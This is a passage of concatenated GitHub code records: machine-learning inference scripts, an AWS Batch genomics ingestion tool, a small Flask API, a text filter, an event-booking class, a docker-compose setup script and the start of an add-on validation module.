neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2, weights = \"distance\") # weights = \"uniform\" is default\nclf.fit(X_train, y_train)\n\nprint(\"Accuracy of 10NN (1/distance weights): %.2f %%\" % (100*accuracy_score(y_test, y_pred)))\n\n# define own weight function\nprint(\"-\" * 10 + \"customized weights\" + \"-\" * 10)\ndef myweight(distances):\n sigma2 = .5 # we can change this number\n return np.exp(-distances**2/sigma2)\n\nclf = neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2, weights= myweight)\nclf.fit(X_train,y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Accuracy of 10NN( customized weights: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# Data Normalization","repo_name":"mozartvn/deeplearning-study","sub_path":"machinelearningbasic/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74541408722","text":"'''\n/home/haeun/21winter/week7/s_models/0215_22:00/10_0_191118_234105_10_1_0_S_6_13_101101100011.png\n: seg to class 완료!\n지금 과제는 한글로 바꾸기\n'''\n\n# import argparse\n# from doctest import OutputChecker\nimport os\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw\nfrom torchvision import datasets\nimport torch\nimport torchvision.transforms as T\n\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\nfrom params import param_segmentation as s_params\nfrom params import param_classification as c_params\nfrom params import food_id\nfrom transforms import classification_transforms as data_transform\nimport c_forInf as CI\nfrom MaskRCNN import get_instance_segmentation_model\n\n\n# 명령어: (haeun21w_1) haeun@gpu-server:~/21winter/week6/seg_from$ CUDA_VISIBLE_DEVICES=5 python tmp_inf.py\n# device setting\ndevice = torch.device(\"cuda\")\nprint(\"... finish cuda setting\")\n# device = torch.device('cpu') \n# print(\"... finish cpu setting\")\n\n# load model (MASKRCNN)\n# model_s_path = s_params['0215_13:30_best_model' # 이걸로 하면 뭔가 잘못됐어\nmodel_s_path = s_params['model_1,2_pre_path']\nprint(\"... loading segmetation model\")\nmodel_s = get_instance_segmentation_model(num_classes=2)\nmodel_s.to(device)\n# model_s = model_s.cpu()\n# model_s.load_state_dict(torch.load(model_s_path), map_location='cpu')\nmodel_s.load_state_dict(torch.load(model_s_path))\nmodel_s.eval()\n\n# load model (ResNet)\ndata_dir = c_params['food_root']\ndataset = datasets.ImageFolder(os.path.join(data_dir, 'train'), data_transform['train'])\nprint(\"... loading classification model\")\nmodel_c = CI.load_checkpoint(device, dataset, c_params)\nmodel_c.eval()\n\n# load images and transform\n# input image = real dataset_cycle1(easy)\ninf_path = s_params['inf_path1']\nprint(\"... loading\", end=' ')\nimg_list = sorted(os.listdir(inf_path)) \nif 'Thumbs.db' in img_list: img_list.remove(\"Thumbs.db\")\ntransform = T.Compose([T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ])\nprint(\"{} images\".format(len(img_list)))\n\n# visualization setting\nout_path = s_params['output_dir']\nout_path = os.path.join(out_path, '0218_04:39')\nif not os.path.isdir(out_path):\n os.makedirs(out_path, exist_ok=True)\nthres = float(0.5)\nprint(\"=\"*20)\n\nprint(\"+++ Start inference !\")\nfor i, img_name in enumerate(img_list):\n if i<=10:\n print(\"... inference ({}/{}) _ {}\".format(i+1, len(img_list), img_name))\n # [segmentation]\n # load and transform image\n img_file = os.path.join(inf_path, img_name) \n img_data = Image.open(img_file).convert(\"RGB\")\n\n # for segmentation\n img_tensor = transform(img_data) \n img_tensor = img_tensor.unsqueeze(0).to(device)\n img_arr = np.array(img_data).astype(np.uint8)\n img_arr_c = np.array(img_data).astype(np.uint8)\n print(\"... finish image setting!\")\n # save_name = os.path.join(out_path, '0.png')\n # cv2.imwrite(save_name, img_arr)\n # forward and post-process results\n pred_result = model_s(img_tensor, None)[0]\n pred_mask = pred_result['masks'].cpu().detach().numpy().transpose(0, 2, 3, 1)\n pred_mask[pred_mask >= 0.5] = 1\n pred_mask[pred_mask < 0.5] = 0\n pred_mask = np.repeat(pred_mask, 3, 3)\n pred_scores = pred_result['scores'].cpu().detach().numpy()\n pred_boxes = pred_result['boxes'].cpu().detach().numpy()\n # pred_labels = pred_result['labels']\n print(\"... finish box setting!\")\n \n # draw predictions\n # print(\"[{} Scores]:\".format(pred_scores.shape[0]), list(pred_scores))\n ids = np.where(pred_scores > thres)[0]\n colors = np.random.randint(0, 255, (len(ids), 3))\n for color_i, pred_i in enumerate(ids):\n # save_name = os.path.join(out_path, '1.png')\n # cv2.imwrite(save_name, img_arr)\n color = tuple(map(int, colors[color_i]))\n # draw segmentation\n mask = pred_mask[pred_i] \n mask = mask * color\n img_arr = cv2.addWeighted(img_arr, 1, mask.astype(np.uint8), 0.5, 0)\n # save_name = os.path.join(out_path, '2.png')\n # cv2.imwrite(save_name, img_arr)\n # draw bbox and text\n x1, y1, x2, y2 = map(int, pred_boxes[pred_i])\n cv2.rectangle(img_arr, (x1, y1), (x2, y2), color, 2)\n # save_name = os.path.join(out_path, '3.png') # mask\n # cv2.imwrite(save_name, img_arr)\n # img_arr: numpy\n # 시작점 xy\n # 끝점 xy\n print(\"... finish drawing segmentation!\")\n # add classification\n top = y2\n left = x1\n height = y2-y1\n width = x2-x1\n # c_image_crop = T.functional.crop(c_image, top, left, height, width)\n # for classification\n crop_img = img_arr_c[y1:y2, x1:x2]\n crop_img = cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB)\n save_name = os.path.join(out_path, '_crop'+img_name)\n cv2.imwrite(save_name, crop_img)\n c_np_image = np.array(crop_img)/255\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n c_np_image = (c_np_image - mean) / std\n c_np_image = c_np_image.transpose((2, 0, 1))\n c_image = torch.Tensor(c_np_image).type(torch.cuda.FloatTensor)\n c_image = c_image.unsqueeze(0)\n output = model_c.forward(c_image)\n probabilities = torch.exp(output)\n top_probabilities, top_indices = probabilities.topk(3)\n\n # Convert to lists\n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0] \n idx_to_class = {value: key for key, value in model_c.class_to_idx.items()}\n top = [idx_to_class[index] for index in top_indices]\n top = ' '.join(top)\n # top = food_id[top]\n print(\"... finish finding class!\")\n \n # edit view\n vis_text = \"Class:{}({:.2f})\".format(top, pred_scores[pred_i])\n '''\n # font 여기부터 안되면 삭제\n font = ImageFont.truetype('/home/haeun/21winter/NanumFont/NanumGothic.ttf', 2)\n img_arr = Image.fromarray(img_arr)\n draw = ImageDraw.Draw(img_arr)\n draw.text((x1+5, y1+15), vis_text, font=font, fill=color)\n img_arr = np.array(img_arr)\n \n 1. 탑3(o) -> 한줄에 하나씩 출력하는방법 ...\n 2. 색칠한상태로 됐을수도 있으니까 크롭한거 저장해보기 ***\n 3. cv2랑 numpy랑 인자가 다르니까 xy틀린건 없는지 확인해보기\n 4. 크롭 안하고 numpy로 바로 슬라이싱해도 된다\n \n '''\n cv2.putText(img_arr, vis_text, (x1+5, y1+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255, 255, 255], 2)\n cv2.putText(img_arr, vis_text, (x1+5, y1+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 1)\n \n # # save for debugging\n # cv2.imwrite(\"tmp_{}.png\".format(color_i), img_arr)\n print(\"... finish editing 1 box!\")\n # save visualized image\n img_arr = cv2.cvtColor(img_arr, cv2.COLOR_BGR2RGB)\n save_name = os.path.join(out_path, img_name)\n cv2.imwrite(save_name, img_arr)\n print(\"... finish editing 1 image!\")","repo_name":"12novel30/Food-Classification-And-Segmentation","sub_path":"week7/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42377647248","text":"#!/usr/bin/env python\n\nimport batchmetrics\nimport boto3\nimport click\nimport math\nimport sys\nimport tempfile\nimport os\n\n# Path and size of scratch directory in the tiledbvcf container.\nscratch_path = \"/data\"\nscratch_size_mb = 1000 * 1024 # 1TB\n\n\nclass JobInfo(object):\n \"\"\"Simple struct to contain batch job information.\"\"\"\n\n def __init__(\n self,\n client=None,\n job_queue=\"\",\n job_definition=\"\",\n depends_on=None,\n max_retries=1,\n metadata_s3=\"\",\n num_store_jobs=1,\n ):\n self.client = client\n self.job_queue = job_queue\n self.job_definition = job_definition\n self.max_retries = max_retries\n self.num_store_jobs = num_store_jobs\n self.metadata_s3 = metadata_s3\n if depends_on is not None:\n self.depends_on = depends_on\n else:\n self.depends_on = []\n\n def depends_on_as_dict(self):\n \"\"\"Returns the job dependencies list in a form that AWS can use.\"\"\"\n result = []\n for job_id in self.depends_on:\n result.append({\"jobId\": job_id, \"type\": \"SEQUENTIAL\"})\n return result\n\n\ndef upload_to_s3(local_file, s3_bucket):\n \"\"\"Upload the given local file to the given S3 bucket.\"\"\"\n s3 = boto3.resource(\"s3\")\n s3.meta.client.upload_file(local_file, s3_bucket, os.path.basename(local_file))\n return \"s3://\" + s3_bucket + \"/\" + os.path.basename(local_file)\n\n\ndef upload_sample_batches(sample_batches, s3_bucket):\n \"\"\"Creates and uploads one or more sample batch text files.\"\"\"\n uris = []\n for i, batch in enumerate(sample_batches):\n with tempfile.TemporaryDirectory() as tmpdir:\n basename = os.path.basename(tmpdir)\n tmpfile = os.path.join(tmpdir, \"samples_batch{}.{}.txt\".format(i, basename))\n with open(tmpfile, \"w\") as f:\n for line in batch:\n f.write(line)\n f.write(\"\\n\")\n uris.append(upload_to_s3(tmpfile, s3_bucket))\n return uris\n\n\ndef get_sample_batches(samples_file, num_batches):\n \"\"\"Return a list of sample batches.\n\n This returns a list containing num_batches lists of sample URIs.\n \"\"\"\n all_lines = []\n with open(samples_file, \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0:\n all_lines.append(line)\n num_samples = len(all_lines)\n samples_per_batch = int(math.ceil(num_samples / float(num_batches)))\n batches = [\n all_lines[i : i + samples_per_batch]\n for i in range(0, num_samples, samples_per_batch)\n ]\n return batches\n\n\ndef get_incremental_samples_file(all_samples_file, i, num_partitions, tmpdir):\n \"\"\"Gets the ith incremental ingest portion of the given samples file.\n\n Partitions the samples in the given file into the ith partition and\n write the ith partition to a new file.\n \"\"\"\n with open(all_samples_file, \"r\") as in_f:\n lines = in_f.readlines()\n num_lines = len(lines)\n lines_per_part = int(math.ceil(num_lines / float(num_partitions)))\n start = i * lines_per_part\n end = min(num_lines, start + lines_per_part)\n\n lines = lines[start:end]\n if len(lines) == 0:\n return None\n\n basename = os.path.basename(tmpdir)\n path = os.path.join(tmpdir, \"{}.{}.txt\".format(i, basename))\n with open(path, \"w\") as out_f:\n out_f.writelines(lines)\n return path\n\n\ndef create_array(array_uri, attributes, job_info):\n \"\"\"Submit a Batch job to create the TileDB array.\"\"\"\n tilevcf_args = [\"create\", \"-u\", array_uri, \"-a\", attributes]\n # Configure the job requirements\n nvcpus = 16\n mem_req_mb = 60 * 1024\n response = job_info.client.submit_job(\n jobName=\"create_array\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_id = response[\"jobId\"]\n print(\"Submitted array creation job {}\".format(job_id))\n return job_id\n\n\ndef register_samples(array_uri, samples_file, job_info):\n \"\"\"Submit a Batch job to register samples in the array before ingestion.\"\"\"\n samples_uri = upload_to_s3(samples_file, job_info.metadata_s3)\n tilevcf_args = [\n \"register\",\n \"-u\",\n array_uri,\n \"-d\",\n scratch_path,\n \"-s\",\n str(scratch_size_mb),\n \"-f\",\n samples_uri,\n ]\n # Configure the job requirements\n nvcpus = 16\n mem_req_mb = 60 * 1024\n response = job_info.client.submit_job(\n jobName=\"register_samples\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_id = response[\"jobId\"]\n print(\n \"Submitted sample registration job {} using metadata {}\".format(\n job_id, samples_uri\n )\n )\n return job_id\n\n\ndef ingest_samples(array_uri, samples_file, job_info):\n \"\"\"Submit multiple Batch jobs to ingest all samples into the array.\"\"\"\n # Split up the work and upload the batches of sample URIs.\n samples_per_job = get_sample_batches(samples_file, job_info.num_store_jobs)\n sample_batch_uris = upload_sample_batches(samples_per_job, job_info.metadata_s3)\n\n # Configure the job requirements. Ingestion does not really benefit from\n # packing multiple jobs onto the same instance, so these requirements are\n # calibrated to use a full m5.4xlarge instance per job.\n nvcpus = 16\n mem_req_mb = 60000\n tilevcf_mem_gb = int(mem_req_mb / 1024)\n\n # Submit one job per sample batch.\n job_ids = []\n for batch_uri in sample_batch_uris:\n tilevcf_args = [\n \"store\",\n \"-u\",\n array_uri,\n \"-d\",\n scratch_path,\n \"-s\",\n str(scratch_size_mb),\n \"-t\",\n str(nvcpus),\n \"-f\",\n batch_uri,\n \"--remove-sample-file\",\n ]\n response = job_info.client.submit_job(\n jobName=\"ingest_samples\",\n jobQueue=job_info.job_queue,\n jobDefinition=job_info.job_definition,\n dependsOn=job_info.depends_on_as_dict(),\n retryStrategy={\"attempts\": job_info.max_retries},\n containerOverrides={\n \"vcpus\": nvcpus,\n \"memory\": mem_req_mb,\n \"command\": tilevcf_args,\n },\n )\n job_ids.append(response[\"jobId\"])\n\n print(\"Submitted ingestion job(s) {}\".format(\" \".join(job_ids)))\n return job_ids\n\n\n@click.command()\n@click.option(\n \"--dataset-uri\",\n required=True,\n help=\"S3 URI of destination TileDB-VCF dataset. If the dataset \"\n \"does not exist, it will be created.\",\n metavar=\"URI\",\n)\n@click.option(\n \"--samples\",\n required=True,\n help=\"Path to file containing a list of sample URIs (one per\" \" line) to ingest.\",\n metavar=\"PATH\",\n)\n@click.option(\n \"--metadata-s3\",\n required=True,\n help=\"Name of a bucket that can be used for shared metadata \"\n \"storage between batch jobs, e.g. uploading lists of \"\n \"samples to register or ingest.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--job-queue\",\n required=True,\n help=\"Name of job queue to use for jobs.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--job-definition\",\n required=True,\n help=\"Name of job definition to use for jobs.\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--attributes\",\n help=\"Comma-separated list of VCF info and/or format field names \"\n \"that should be extracted as separate TileDB attributes. \"\n \"This option is only used if the destination array does not \"\n \"yet exist.\",\n default=\"fmt_GT,fmt_DP,fmt_GQ,fmt_MIN_DP\",\n metavar=\"CSV\",\n)\n@click.option(\n \"--num-jobs\",\n default=1,\n help=\"Number of jobs to submit for ingestion. Each job will be \"\n \"responsible for ingesting nsamples/njobs samples to the \"\n \"array. When combined with --incremental, each incremental \"\n \"batch uses this many jobs.\",\n metavar=\"N\",\n)\n@click.option(\n \"--region\",\n help=\"AWS region name of Batch environment\",\n default=\"us-east-1\",\n metavar=\"NAME\",\n)\n@click.option(\n \"--retries\",\n help=\"Max number (1-10) of retries for failed jobs.\",\n default=1,\n metavar=\"N\",\n)\n@click.option(\n \"--wait\", help=\"Waits for all jobs to complete before exiting.\", is_flag=True\n)\n@click.option(\n \"--incremental\",\n default=1,\n metavar=\"N\",\n help=\"If specified, ingest the samples in N batches instead of \" \"all at once.\",\n)\ndef main(\n dataset_uri,\n samples,\n attributes,\n job_queue,\n job_definition,\n region,\n metadata_s3,\n num_jobs,\n retries,\n wait,\n incremental,\n):\n \"\"\"Ingest VCF sample data into a TileDB-VCF dataset via AWS Batch.\n\n This script requires an existing AWS Batch setup, including a job definition\n with a Docker image containing the TileDB-VCF CLI executable. The CLI\n executable is invoked in each batch job by this script using the `command`\n container override parameter.\n\n Ingestion of the samples (specified via --samples argument) is distributed\n across the specified number of Batch jobs (--num-jobs), irrespective of\n the number of instances in the compute environment. For example, if there\n are 1,000 samples to be ingested, the compute environment contains 10\n instances, and 10 jobs are requested, each instance will execute 1 job that\n ingests 100 samples at a time. If 100 jobs were requested, 100 jobs would be\n queued (each ingesting 10 samples), and the 10 instances would pull jobs\n from the queue until all are finished.\n\n The bucket specified with the --metadata-s3 argument is used to store a file\n for each job containing the list of samples the job should ingest.\n \"\"\"\n\n job_info = JobInfo(\n job_queue=job_queue,\n job_definition=job_definition,\n client=boto3.client(\"batch\", region_name=region),\n max_retries=retries,\n num_store_jobs=num_jobs,\n metadata_s3=metadata_s3,\n )\n create_job_id = create_array(dataset_uri, attributes, job_info)\n\n for i in range(0, incremental):\n with tempfile.TemporaryDirectory() as tmpdir:\n batch_samples = get_incremental_samples_file(\n samples, i, incremental, tmpdir\n )\n\n # Check for empty list of samples\n if batch_samples is None:\n continue\n\n job_info.depends_on = [create_job_id] if i == 0 else []\n register_job_id = register_samples(dataset_uri, batch_samples, job_info)\n\n job_info.depends_on = [register_job_id]\n job_ids = ingest_samples(dataset_uri, batch_samples, job_info)\n\n if wait:\n # Registration stats\n name = \"registration {} of {}\".format(i + 1, incremental)\n stats = batchmetrics.wait_all(\n [register_job_id], job_info.client, job_name=name\n )\n batchmetrics.print_stats_report(stats, instance_price_per_hr=0.768)\n\n # Ingest stats\n name = \"ingestion {} of {}\".format(i + 1, incremental)\n stats = batchmetrics.wait_all(job_ids, job_info.client, job_name=name)\n batchmetrics.print_stats_report(stats, instance_price_per_hr=0.768)\n if stats[\"num_succeeded\"] != stats[\"num_jobs\"]:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"glycoaddict/djangotileremotedev","sub_path":"TileDB-VCF/apis/aws-batch/batch-ingest.py","file_name":"batch-ingest.py","file_ext":"py","file_size_in_byte":11817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34857757700","text":"from rnavis import app\nfrom flask_restful import Resource, Api, reqparse\nimport pandas\nimport rnavis.gene_expression as ge\nimport sqlalchemy as sql\nimport psycopg2 # needs to imported because sqlalchemy uses it by default\nimport os\napi = Api(app)\n\npost_parser = reqparse.RequestParser()\npost_parser.add_argument('schema', dest='schema', required=True,\n location='json',\n help='The schema representing experiment name')\npost_parser.add_argument('table', dest='table', required=True, location='json',\n help='Table name with count data')\npost_parser.add_argument('batch', dest='batch', required=False,\n location='json',\n help='list of ints which specify batch')\n\nengine = os.environ.get(\"ENGINE\")\nengine = sql.create_engine(engine)\n\nmm = ge.matrix_manipulation()\n\n\nclass pca_points(Resource):\n\n def post(self):\n args = post_parser.parse_args()\n\n if args.batch:\n try:\n matrix_name = args.schema + '_' + args.table\n mm.make_batch_matrix(batch_list=list(args.batch),\n name=matrix_name)\n results = ge.pca_json(mm.get_batch_matrix(name=matrix_name))\n except KeyError:\n print(\"need voom normalized matrix before batch correcting\")\n else:\n try:\n matrix_name = args.schema + '_' + args.table\n results = ge.pca_json(mm.get_norm_matrix(name=matrix_name))\n except KeyError:\n if args.table == 'gene counts':\n table_name = \"protein_gene_counts\"\n if args.table == 'nascent counts':\n table_name = \"protein_intron_counts\"\n counts = pandas.read_sql_table(table_name,\n index_col='Gene',\n con=engine,\n schema=args.schema)\n mm.add_counts_matrix(name=matrix_name, counts_matrix=counts)\n results = ge.pca_json(mm.get_norm_matrix(name=matrix_name))\n return results.to_dict(orient='records')\n\napi.add_resource(pca_points, '/data')\n","repo_name":"JakeHagen/rnavis","sub_path":"rnavis/matrix_manip_api.py","file_name":"matrix_manip_api.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27340205694","text":"import re\n\n\nclass ChineseFilter:\n @staticmethod\n def filterText(s: str) -> list:\n texts = [u\"啊a1446呃呃OK⭕🎶步品破茶\",\n u\"点击http://www.hikki.top网址\",\n u\"链接ed2k://|file|dld-021.avi|1016078437|620703E6CD6F00BF67102544D6BB00C4|/\",\n u\"啊啊啊✨ ​​​好🌹\",\n s]\n pattern = re.compile(r\"[^\\x00-\\xff\\u200b]\", )\n emojiPattern = re.compile(r\"[\\u4e00-\\u9fa5]\", )\n res = []\n for text in texts:\n temp = pattern.findall(text)# 筛选掉单个的16进制字符\n textWithEmoji = \"\"\n for i in temp: textWithEmoji += i\n\n chinese = \"\"\n for i in emojiPattern.findall(textWithEmoji): chinese += i\n\n # 如果没其他语言的话,emojiPattern.split(textWithEmoji)也可以\n textEmoji = \"\"\n for i in re.findall(\"[^\\u4e00-\\u9fa5ぁ-んァ-ン]\", textWithEmoji): textEmoji += i\n\n jp=\"\"\n for i in re.findall(\"[ぁ-んァ-ン]\", textWithEmoji): jp +=i\n\n dic = {\"text\": chinese, \"emoji\": textEmoji}\n if jp !=\"\" : dic[\"others\"] = jp\n\n res.append(dic)\n return res\n","repo_name":"FoVNull/NLPDemo_py","sub_path":"Cleaning/ChineseDemo.py","file_name":"ChineseDemo.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27827918837","text":"import pandas as pd\r\nimport csv\r\n\r\nimport logger\r\n\r\n\r\nclass Event:\r\n event_list = []\r\n def __init__(self, id_event, name_event, date_event, time_event, place_event, cost_event, total_capacity,\r\n flag_event=1):\r\n \"\"\"\r\n this class create a event buy admin\r\n id_event:\r\n name_event: name of event\r\n date_event: date of event\r\n time_event: time of event\r\n place_event: place of event\r\n cost_event: cost of event\r\n total_capacity: total capacity\r\n mod_total_capacity: mod of capacity\r\n flag_event: event live or not\r\n \"\"\"\r\n self.id_event = id_event\r\n self.name_event = name_event\r\n self.date_event = date_event\r\n self.time_event = time_event\r\n self.place_event = place_event\r\n self.cost_event = cost_event\r\n self.total_capacity = total_capacity\r\n self.mod_total_capacity = total_capacity\r\n self.flag_event = 1\r\n\r\n\r\n @staticmethod\r\n def event_():\r\n path_file = \"event.csv\"\r\n df_id_event = pd.read_csv(path_file)\r\n list_id_event = []\r\n while True:\r\n\r\n id_event = input(\" enter id_event: \")\r\n if id_event in list_id_event:\r\n print(\"the id_event is already taken\")\r\n elif id_event == \"\":\r\n print(\"ERROR: your input id is blank\")\r\n else:\r\n list_id_event.append(id_event)\r\n break\r\n\r\n name_event = input(\" enter name_event: \")\r\n date_event = input(\" enter date_event: \")\r\n time_event = input(\" enter time_event: \")\r\n place_event = input(\"enter place_event: \")\r\n cost_event = input(\"enter cost_event: \")\r\n total_capacity = input(\"enter total_capacity: \")\r\n flag_event = 1\r\n\r\n\r\n\r\n\r\n obj_event = Event(id_event, name_event, date_event, time_event, place_event, cost_event, total_capacity,flag_event)\r\n Event.event_list.append(obj_event)\r\n # path_file = \"event.csv\"\r\n row = [[id_event,name_event,date_event,time_event,place_event,cost_event,total_capacity, obj_event.mod_total_capacity,flag_event]]\r\n with open(path_file, 'a', newline='') as csv_show_event:\r\n csv_writer = csv.writer(csv_show_event)\r\n csv_writer.writerows(row)\r\n # logger.info_logger.info(f'{name_event} is created')\r\n return obj_event\r\n\r\n# event1=Event.event_()\r\n\r\ndef show_event():\r\n path_file = \"event.csv\"\r\n # file = open(path_file)\r\n df_show_event = pd.read_csv(path_file)\r\n print(df_show_event)\r\n\r\n\r\n\r\ndef choose_event(ev_id):\r\n with open(\"event.csv\", 'r') as reader_obj:\r\n csv_reader = csv.DictReader(reader_obj)\r\n # line_count = 0\r\n for row in csv_reader:\r\n if row['id_event'] == str(ev_id):\r\n for key, value in row.items():\r\n print(value, end=' ')\r\n # print(row)\r\n\r\n\r\n\r\n\r\n\r\ndef update_capacity():\r\n update_total_capacity = pd.read_csv(\"event.csv\")\r\n print(update_total_capacity)\r\n location = 0\r\n eventID = input('Enter the id here:')\r\n with open(\"event.csv\", 'r') as my_file:\r\n csv_reader = csv.DictReader(my_file)\r\n for row in csv_reader:\r\n if row['id_event'] == eventID:\r\n capacity = input('Enter capacity:')\r\n row['total_capacity'] = capacity\r\n update_total_capacity.loc[location, 'total_capacity'] = capacity\r\n update_total_capacity.to_csv(\"event.csv\", index=False)\r\n location += 1\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"somaye-amraee/somayeProject1","sub_path":"maktab_51_hw_final_somaye_amraei/event1.py","file_name":"event1.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34173962390","text":"import feedparser\nimport logging\n\nfrom rss.rss_feed.feed_url import Technology\n\n\nclass RSSRead:\n\n def read_entries(self, link):\n try:\n res = feedparser.parse(link)\n return res['entries']\n except Exception as exe:\n logging.exception(exe)\n\n def get_data(self, entries):\n result = []\n for entry in entries:\n _data = {}\n _data['link'] = entry['link']\n _data['title'] = entry['title']\n result.append(_data)\n return result\n\n def construct_data(self):\n data = {}\n for key, value in Technology.TECHNOLOGY_URLS.items():\n entries = self.read_entries(value)\n data[key] = self.get_data(entries)\n return data\n\nif __name__ == \"__main__\":\n rss = RSSRead()\n print(rss.construct_data())\n","repo_name":"SowmyaLR/RSSFeed","sub_path":"rss/rss_feed/rss_read.py","file_name":"rss_read.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43883853571","text":"import subprocess\nimport sys\n\n\ndef setup():\n process = subprocess.Popen(\"\"\"/sbin/ip route|awk '/default/{print$3}'\"\"\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if err.decode('ascii').strip() != \"\":\n sys.exit(err)\n host = out.decode('ascii').strip()\n create_env_file(host)\n\n install_docker_compose()\n subprocess.run(to_args(\"rm ~/.docker/config.json\"))\n subprocess.run(to_args(\"docker-compose up\"))\n\n\ndef create_env_file(host: str):\n line = \"HOST = \" + host\n with open(\".env\", 'w+') as f:\n f.write(line)\n print(\".env created with \" + line)\n\n\ndef install_docker_compose():\n process = subprocess.Popen(to_args(\"docker-compose --version\"), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if \"docker-compose\" in out.decode('ascii') and \"version\" in out.decode('ascii'):\n return\n subprocess.run(to_args(\"\"\"curl -L \"https://github.com/docker/compose/releases/download/1.28.3/docker-compose-$(uname -s)-$(uname -m)\" -o /usr/local/bin/docker-compose\"\"\"))\n subprocess.run(to_args(\"chmod +x /usr/local/bin/docker-compose\"))\n\n\ndef to_args(command: str):\n return command.split(\" \")\n\n\nif __name__ == \"__main__\":\n setup()","repo_name":"Seris370/Pub-Sub-Messaging","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23867647125","text":"\"\"\"Validate add-ons options schema.\"\"\"\nimport logging\nimport re\nimport secrets\nfrom typing import Any\nimport uuid\n\nimport voluptuous as vol\n\nfrom ..const import (\n ARCH_ALL,\n ATTR_ACCESS_TOKEN,\n ATTR_ADVANCED,\n ATTR_APPARMOR,\n ATTR_ARCH,\n ATTR_ARGS,\n ATTR_AUDIO,\n ATTR_AUDIO_INPUT,\n ATTR_AUDIO_OUTPUT,\n ATTR_AUTH_API,\n ATTR_AUTO_UPDATE,\n ATTR_BACKUP_EXCLUDE,\n ATTR_BACKUP_POST,\n ATTR_BACKUP_PRE,\n ATTR_BOOT,\n ATTR_BUILD_FROM,\n ATTR_CONFIGURATION,\n ATTR_DESCRIPTON,\n ATTR_DEVICES,\n ATTR_DEVICETREE,\n ATTR_DISCOVERY,\n ATTR_DOCKER_API,\n ATTR_ENVIRONMENT,\n ATTR_FULL_ACCESS,\n ATTR_GPIO,\n ATTR_HASSIO_API,\n ATTR_HASSIO_ROLE,\n ATTR_HOMEASSISTANT,\n ATTR_HOMEASSISTANT_API,\n ATTR_HOST_DBUS,\n ATTR_HOST_IPC,\n ATTR_HOST_NETWORK,\n ATTR_HOST_PID,\n ATTR_HOST_UTS,\n ATTR_IMAGE,\n ATTR_INGRESS,\n ATTR_INGRESS_ENTRY,\n ATTR_INGRESS_PANEL,\n ATTR_INGRESS_PORT,\n ATTR_INGRESS_STREAM,\n ATTR_INGRESS_TOKEN,\n ATTR_INIT,\n ATTR_JOURNALD,\n ATTR_KERNEL_MODULES,\n ATTR_LABELS,\n ATTR_LEGACY,\n ATTR_LOCATON,\n ATTR_MACHINE,\n ATTR_MAP,\n ATTR_NAME,\n ATTR_NETWORK,\n ATTR_OPTIONS,\n ATTR_PANEL_ADMIN,\n ATTR_PANEL_ICON,\n ATTR_PANEL_TITLE,\n ATTR_PORTS,\n ATTR_PORTS_DESCRIPTION,\n ATTR_PRIVILEGED,\n ATTR_PROTECTED,\n ATTR_REALTIME,\n ATTR_REPOSITORY,\n ATTR_SCHEMA,\n ATTR_SERVICES,\n ATTR_SLUG,\n ATTR_SQUASH,\n ATTR_STAGE,\n ATTR_STARTUP,\n ATTR_STATE,\n ATTR_STDIN,\n ATTR_SYSTEM,\n ATTR_TIMEOUT,\n ATTR_TMPFS,\n ATTR_TRANSLATIONS,\n ATTR_UART,\n ATTR_UDEV,\n ATTR_URL,\n ATTR_USB,\n ATTR_USER,\n ATTR_UUID,\n ATTR_VERSION,\n ATTR_VIDEO,\n ATTR_WATCHDOG,\n ATTR_WEBUI,\n ROLE_ALL,\n ROLE_DEFAULT,\n AddonBoot,\n AddonStage,\n AddonStartup,\n AddonState,\n)\nfrom ..discovery.validate import valid_discovery_service\nfrom ..docker.const import Capabilities\nfrom ..validate import (\n 